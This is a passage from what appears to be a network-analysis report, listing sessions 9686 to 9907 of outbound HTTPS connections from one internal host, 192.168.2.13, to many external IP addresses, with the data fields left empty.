                                    9686192.168.2.133864217.217.64.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9687192.168.2.133282885.222.171.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9688192.168.2.1359476213.225.153.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9689192.168.2.1350112192.139.57.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9690192.168.2.1355180124.204.216.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9691192.168.2.1343534202.3.13.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9692192.168.2.1357692223.109.212.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9693192.168.2.1348616206.50.49.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9694192.168.2.1358788120.23.198.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9695192.168.2.1337252212.139.189.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9696192.168.2.1344510136.251.62.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9697192.168.2.135143642.98.146.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9698192.168.2.1349012100.29.198.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9699192.168.2.1356842164.206.26.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9700192.168.2.135774851.222.144.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9701192.168.2.1346744220.96.224.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9702192.168.2.134581071.32.220.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9703192.168.2.135746075.115.127.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9704192.168.2.1351954109.213.154.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9705192.168.2.1333752172.79.196.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9706192.168.2.1336110202.91.220.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9707192.168.2.13377949.137.162.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9708192.168.2.1345988103.121.244.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9709192.168.2.1358980202.237.65.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9710192.168.2.1339544125.104.153.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9711192.168.2.1351772141.128.136.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9712192.168.2.1351974153.192.91.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9713192.168.2.135579693.229.44.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9714192.168.2.1335344119.125.72.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9715192.168.2.135055447.120.79.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9716192.168.2.1348244104.62.21.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9717192.168.2.135956052.28.57.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9718192.168.2.135804260.85.125.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9719192.168.2.1346460111.169.167.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9720192.168.2.1352014195.107.64.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9721192.168.2.135814674.56.171.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9722192.168.2.133684034.143.48.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9723192.168.2.135576444.211.239.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9724192.168.2.1341336172.154.166.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9725192.168.2.1360578103.20.175.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9726192.168.2.1339672130.223.253.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9727192.168.2.1360158203.151.187.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9728192.168.2.1350416155.213.57.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9729192.168.2.1358600148.106.86.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9730192.168.2.1338056151.136.182.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9731192.168.2.133544460.190.63.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9732192.168.2.136092898.153.97.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9733192.168.2.1334484166.111.174.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9734192.168.2.1338720187.4.94.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9735192.168.2.134945069.30.232.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9736192.168.2.1342086146.129.25.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9737192.168.2.133597853.224.85.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9738192.168.2.13484944.186.239.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9739192.168.2.135583477.106.119.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9740192.168.2.1339036182.166.49.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9741192.168.2.1345912213.180.153.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9742192.168.2.133971097.218.205.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9743192.168.2.134153243.21.81.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9744192.168.2.134008245.75.227.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9745192.168.2.1338696163.178.87.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9746192.168.2.133647067.130.144.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9747192.168.2.1338312171.203.114.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9748192.168.2.134341294.166.134.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9749192.168.2.134268067.189.96.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9750192.168.2.1339996141.247.158.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9751192.168.2.135223862.173.34.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9752192.168.2.134119451.7.231.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9753192.168.2.1353762216.160.82.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9754192.168.2.133977423.213.2.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9755192.168.2.1347856161.102.169.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9756192.168.2.134412286.245.227.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9757192.168.2.135549814.62.40.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9758192.168.2.1356824156.18.7.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9759192.168.2.1345238119.164.155.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9760192.168.2.1359346151.62.156.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9761192.168.2.134185663.244.86.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9762192.168.2.134926240.167.194.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9763192.168.2.1341570140.190.10.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9764192.168.2.134957651.19.225.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9765192.168.2.1337882206.50.254.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9766192.168.2.1334866142.242.235.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9767192.168.2.133823496.155.70.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9768192.168.2.1338728187.113.36.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9769192.168.2.135539439.125.168.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9770192.168.2.1359424119.95.94.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9771192.168.2.1338624161.203.111.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9772192.168.2.1358448120.197.106.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9773192.168.2.1348930134.130.130.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9774192.168.2.13508208.89.67.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9775192.168.2.1356714147.60.175.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9776192.168.2.1340856198.85.148.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9777192.168.2.133977441.90.196.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9778192.168.2.134755036.81.54.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9779192.168.2.135172238.13.29.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9780192.168.2.1341866188.48.233.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9781192.168.2.1349400142.59.77.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9782192.168.2.1341748115.103.143.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9783192.168.2.1359148124.75.33.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9784192.168.2.1345550113.197.37.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9785192.168.2.1343220126.156.224.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9786192.168.2.13364425.99.55.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9787192.168.2.136019045.141.220.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9788192.168.2.133444473.79.181.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9789192.168.2.1343352213.8.28.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9790192.168.2.135379644.72.78.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9791192.168.2.134047085.242.203.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9792192.168.2.1360412124.183.144.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9793192.168.2.135119847.89.25.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9794192.168.2.1352248211.57.121.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9795192.168.2.1351250154.187.208.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9796192.168.2.135741893.245.222.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9797192.168.2.134548836.9.174.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9798192.168.2.1342384134.83.243.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9799192.168.2.134069839.149.123.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9800192.168.2.133678657.62.245.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9801192.168.2.1337868209.84.144.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9802192.168.2.1341532196.247.197.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9803192.168.2.133424895.255.127.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9804192.168.2.135972648.96.242.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9805192.168.2.134725645.33.23.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9806192.168.2.1335732161.29.67.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9807192.168.2.1332808141.95.144.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9808192.168.2.1359802182.191.147.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9809192.168.2.1334256205.253.114.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9810192.168.2.134163253.54.194.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9811192.168.2.1334466194.60.167.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9812192.168.2.134766269.64.85.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9813192.168.2.1337852219.134.101.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9814192.168.2.133907475.20.103.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9815192.168.2.1342214178.108.31.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9816192.168.2.1360902170.22.166.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9817192.168.2.135529698.235.220.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9818192.168.2.133647062.145.109.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9819192.168.2.1335912154.211.239.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9820192.168.2.1349648210.4.139.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9821192.168.2.1358568189.203.29.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9822192.168.2.133687057.210.179.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9823192.168.2.135893665.201.96.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9824192.168.2.1356790188.108.147.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9825192.168.2.1355184199.125.234.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9826192.168.2.136096854.27.164.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9827192.168.2.134485436.43.228.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9828192.168.2.1338852191.46.152.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9829192.168.2.1354998207.31.247.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9830192.168.2.1349830149.97.142.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9831192.168.2.135840676.223.137.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9832192.168.2.1338150119.230.11.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9833192.168.2.135734883.156.80.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9834192.168.2.1345546188.18.215.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9835192.168.2.1333734206.11.33.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9836192.168.2.133843876.246.177.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9837192.168.2.133633037.119.13.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9838192.168.2.1335790133.56.126.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9839192.168.2.133647684.186.166.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9840192.168.2.1334070130.118.52.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9841192.168.2.1338062109.187.13.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9842192.168.2.134960043.79.28.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9843192.168.2.1360668160.25.228.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9844192.168.2.1348738138.134.90.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9845192.168.2.1358496184.99.197.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9846192.168.2.1349276142.117.164.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9847192.168.2.1360760164.9.165.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9848192.168.2.135385473.7.76.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9849192.168.2.1339398207.158.192.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9850192.168.2.1353448190.232.47.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9851192.168.2.1360792168.208.96.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9852192.168.2.1336988169.221.156.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9853192.168.2.133643664.113.232.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9854192.168.2.1344948175.24.41.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9855192.168.2.1346454144.111.106.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9856192.168.2.1339270153.194.243.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9857192.168.2.1360730162.170.3.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9858192.168.2.1350634197.98.44.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9859192.168.2.133927693.10.134.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9860192.168.2.133994214.2.95.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9861192.168.2.135395474.145.199.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9862192.168.2.1335596136.124.245.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9863192.168.2.1340878143.214.187.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9864192.168.2.1338588217.60.95.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9865192.168.2.1344634192.220.137.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9866192.168.2.135848846.82.61.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9867192.168.2.1344666143.229.208.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9868192.168.2.134282287.250.148.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9869192.168.2.133878054.142.144.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9870192.168.2.1346466113.40.98.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9871192.168.2.1344562200.100.209.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9872192.168.2.134669285.19.167.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9873192.168.2.134867450.247.106.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9874192.168.2.1349374161.146.116.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9875192.168.2.1336396193.182.238.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9876192.168.2.1335432218.51.163.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9877192.168.2.1359902104.10.122.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9878192.168.2.1337792207.77.153.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9879192.168.2.1358386117.187.92.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9880192.168.2.1341044181.21.62.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9881192.168.2.1356924156.45.132.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9882192.168.2.135966066.114.36.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9883192.168.2.1357524160.234.246.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9884192.168.2.1336912183.26.206.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9885192.168.2.1344052135.121.141.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9886192.168.2.1341616112.245.244.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9887192.168.2.1357682178.16.229.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9888192.168.2.134912083.57.16.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9889192.168.2.1348114208.65.135.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9890192.168.2.133658264.206.40.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9891192.168.2.134647057.173.40.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9892192.168.2.1353318173.69.10.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9893192.168.2.1354540169.57.212.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9894192.168.2.135764461.57.4.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9895192.168.2.134394842.169.84.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9896192.168.2.1359768207.54.162.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9897192.168.2.135016661.165.135.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9898192.168.2.1357172114.17.80.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9899192.168.2.1357812129.12.124.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9900192.168.2.134853877.122.30.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9901192.168.2.1350312131.252.167.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9902192.168.2.1355586208.251.167.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9903192.168.2.133308665.232.130.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9904192.168.2.134799058.220.158.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9905192.168.2.135680889.124.149.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9906192.168.2.134795499.57.188.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9907192.168.2.133302813.55.127.116443
                                    TimestampBytes transferredDirectionData


